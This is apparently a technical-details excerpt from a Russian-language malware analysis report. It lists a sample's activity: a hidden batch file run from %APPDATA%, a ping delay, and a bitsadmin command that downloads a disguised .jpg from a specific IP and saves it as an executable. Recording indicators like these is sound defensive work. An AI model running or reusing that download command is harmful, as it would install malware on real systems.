Техническая информация
- '<SYSTEM32>\cmd.exe' /c %APPDATA%\policewomanremonstranceshodgepodge.bat
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2032
- %APPDATA%\policewomanremonstranceshodgepodge.bat
- %APPDATA%\~$licewomanremonstranceshodgepodge.bat
- nul
- %TEMP%\1179055.cvr
- %APPDATA%\~$licewomanremonstranceshodgepodge.bat
- '18#.#65.29.36':80
- '<SYSTEM32>\cmd.exe' /c %APPDATA%\policewomanremonstranceshodgepodge.bat' (со скрытым окном)
- '<SYSTEM32>\ping.exe' -n 10 127.0.0.1
- '<SYSTEM32>\bitsadmin.exe' /transfer backup /download /priority high http://185.165.29.36/111.jpg "%APPDATA%\ambienceoiretqualities.exe"